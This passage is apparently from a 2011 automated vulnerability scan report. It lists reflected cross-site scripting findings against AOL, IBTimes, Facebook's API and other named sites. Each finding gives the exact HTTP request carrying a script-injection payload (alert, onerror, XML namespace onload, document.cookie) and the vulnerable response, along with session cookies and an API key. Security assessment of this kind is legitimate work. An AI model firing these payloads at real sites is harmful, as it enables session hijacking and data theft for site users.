User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=bda159010a031f735b16f1ecc1bb52c2; expires=Tue, 01 Mar 2011 23:53:25 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 20:20:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 23302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<img src='/sites/default/files/webfm/brand-logos/engadgetbdddb'><script>alert(1)</script>9c1db18b1e0.png' alt='engadgetbdddb'>
...[SNIP]...

1.28. http://advertising.aol.com/brands/engadget [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/engadget

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d672"><script>alert(1)</script>3b70e9dcf4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/engadget?9d672"><script>alert(1)</script>3b70e9dcf4e=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=26ddbfcfb72d0cd13cdd4841bd55099a; expires=Tue, 01 Mar 2011 23:53:13 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 20:19:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 30567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a name="aol-share" class="aol-share" href="mailto:yourfriend@email.com?subject=Check this out: AOL Advertising | Brands/Engadget&body=http://advertising.aol.com/brands/engadget?9d672"><script>alert(1)</script>3b70e9dcf4e=1" title="AOL Advertising | Brands/Engadget">
...[SNIP]...

1.29. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://africa.ibtimes.com
Path:   /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c3c"-alert(1)-"489c5415bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?49c3c"-alert(1)-"489c5415bae=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dc543bc55452b21506b39f10b8963776; expires=Sun, 06 Feb 2011 22:19:59 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
var exURL = escape("http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?49c3c"-alert(1)-"489c5415bae=1");
var exHed = encodeURIComponent("Google Grants $100 Mln Equity to Eric Schmidt");
var exDek = encodeURIComponent("Search giant Google said it will award $100 million worth of equity to Eri
...[SNIP]...

1.30. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://africa.ibtimes.com
Path:   /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce9ce"><script>alert(1)</script>4fa7211aef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?ce9ce"><script>alert(1)</script>4fa7211aef3=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=b470a06fa0e8e476a5bf0dab6d10a9ed; expires=Sun, 06 Feb 2011 22:19:56 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<input type="hidden" id="urlhome" value="http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?ce9ce"><script>alert(1)</script>4fa7211aef3=1">
...[SNIP]...

1.31. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://africa.ibtimes.com
Path:   /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6330e'-alert(1)-'bdd8bdef0e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?6330e'-alert(1)-'bdd8bdef0e3=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8dc726c62f556b216ff22cbd19d8797c; expires=Sun, 06 Feb 2011 22:20:01 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
cript type="text/javascript">
                                                                                       tweetmeme_url = 'http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?6330e'-alert(1)-'bdd8bdef0e3=1';
                                                                                       tweetmeme_source = 'IBTIMES.COM';
                                                                               </script>
...[SNIP]...

1.32. http://aol.tt.omtrdc.net/m2/aol/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.tt.omtrdc.net
Path:   /m2/aol/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 7afda<script>alert(1)</script>150cf4dbb8a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/aol/mbox/standard?mboxHost=travel.aol.com&mboxSession=1297021706926-216891&mboxPage=1297021706926-216891&screenHeight=1200&screenWidth=1920&browserWidth=1001&browserHeight=1031&browserTimeOffset=-360&colorDepth=16&mboxCount=1&dept=Main&subDept=Travel%20Main&pageName=Travel%20Main&mbox=AOL_Travel_Global7afda<script>alert(1)</script>150cf4dbb8a&mboxId=0&mboxTime=1297000108866&mboxURL=http%3A%2F%2Ftravel.aol.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: aol.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://travel.aol.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 213
Date: Sun, 06 Feb 2011 19:51:18 GMT
Server: Test & Target

mboxFactories.get('default').get('AOL_Travel_Global7afda<script>alert(1)</script>150cf4dbb8a',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1297021706926-216891.17");

1.33. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5751e<script>alert(1)</script>0a7121bf666 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun5751e<script>alert(1)</script>0a7121bf666&callback=bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 06 Feb 2011 20:59:22 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun5751e<script>alert(1)</script>0a7121bf666)

1.34. http://api.bizographics.com/v1/profile.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a9d50<script>alert(1)</script>8356ded867a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun&callback=bizo_callbacka9d50<script>alert(1)</script>8356ded867a HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sun, 06 Feb 2011 20:59:25 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KerMh8N4wnRRaj5XcunNcMDa7Re6IGD4lFp4YH8CH6lnAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtTclMip9ek9khgmm0D5jgFUisEVUJBxdqAyBeojO7uEzb2p0Yl2wVR6WyPhWWt9YcKJ0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 203
Connection: keep-alive

bizo_callbacka9d50<script>alert(1)</script>8356ded867a({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.35. http://api.dimestore.com/viapi [name parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 8d0f9<a>df4d06c17ec was submitted in the name parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=cookie&value=EyADRWJEY0NpdVl%252BSWFG&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D8d0f9<a>df4d06c17ec&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sun, 06 Feb 2011 20:25:04 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: IgUsFjsrORc3NyILDBo6HychGw%3D%3D8d0f9<a>df4d06c17ec=EyADRWJEY0NpdVl%2BSWFG; Expires=Mon, 06-Feb-2012 20:25:04 GMT
Content-Length: 186

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IgUsFjsrORc3NyILDBo6HychGw%3D%3D8d0f9<a>df4d06c17ec</name><value>EyADRWJEY0NpdVl%2BSWFG</value></cookie></response>

1.36. http://api.dimestore.com/viapi [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the name request parameter is copied into the XML document as plain text between tags. The payload 8e4e5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>73605709c16 was submitted in the name parameter. This input was echoed as 8e4e5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>73605709c16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /viapi?action=cookie&name=IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%253D8e4e5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>73605709c16&mode=get HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sun, 06 Feb 2011 20:25:03 GMT
Content-Type: text/xml
Connection: keep-alive
Content-Length: 244

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%3D8e4e5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>73605709c16</name>
...[SNIP]...

1.37. http://api.dimestore.com/viapi [value parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the value request parameter is copied into the XML document as plain text between tags. The payload a2b55<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>43cd31f02e9 was submitted in the value parameter. This input was echoed as a2b55<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>43cd31f02e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /viapi?action=cookie&value=EyADRWJEY0NpdVl%252BSWFGa2b55<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>43cd31f02e9&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sun, 06 Feb 2011 20:25:04 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: IgUsFjsrORc3NyILDBo6HychGw%3D%3D="EyADRWJEY0NpdVl%2BSWFGa2b55<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>43cd31f02e9"; Version=1; Max-Age=31536000
Content-Length: 256

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IgUsFjsrORc3NyILDBo6HychGw%3D%3D</name><value>EyADRWJEY0NpdVl%2BSWFGa2b55<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>43cd31f02e9</value>
...[SNIP]...

1.38. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload ee046<img%20src%3da%20onerror%3dalert(1)>f2ed30b6f31 was submitted in the method parameter. This input was echoed as ee046<img src=a onerror=alert(1)>f2ed30b6f31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?format=json&method=links.getStatsee046<img%20src%3da%20onerror%3dalert(1)>f2ed30b6f31&urls=http%253A%252F%252Fwww.electronista.com%252Farticles%252F11%252F02%252F04%252Fsales.of.glasses.free.3d.tvs.weaker.than.expected%252F%253Fe4c13%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ec3b351ab889%253D1&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsmallbusiness.aol.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fsmallbusiness.aol.com%252F%253F998a2%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9cd08062e59%253D1%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Sun, 06 Feb 2011 20:38:25 GMT
Content-Length: 481

aptureJsonCallback0({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"format","value":"json"},{"key":"method","value":"links.getStatsee046<img src=a onerror=alert(1)>f2ed30b6f31"},{"key":"urls","value":"http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C
...[SNIP]...

1.39. http://api.facebook.com/restserver.php [urls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 9cac7<img%20src%3da%20onerror%3dalert(1)>428383ff7dc was submitted in the urls parameter. This input was echoed as 9cac7<img src=a onerror=alert(1)>428383ff7dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?format=json&method=links.getStats&urls=http%253A%252F%252Fwww.electronista.com%252Farticles%252F11%252F02%252F04%252Fsales.of.glasses.free.3d.tvs.weaker.than.expected%252F%253Fe4c13%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ec3b351ab889%253D19cac7<img%20src%3da%20onerror%3dalert(1)>428383ff7dc&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsmallbusiness.aol.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fsmallbusiness.aol.com%252F%253F998a2%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9cd08062e59%253D1%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 06 Feb 2011 12:40:37 -0800
Pragma:
X-Cnection: close
Date: Sun, 06 Feb 2011 20:38:37 GMT
Content-Length: 642

aptureJsonCallback0([{"url":"http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D19cac7<img src=a onerror=alert(1)>428383ff7dc","normalized_url":"http:\/\/www.electronista.com\/articles\/11\/02\/04\/sales.of.glasses.free.3d.tvs.weaker.than.expected\/?e4c13%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ec3b351ab889=
...[SNIP]...

1.40. http://api.screenname.aol.com/auth/getToken [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

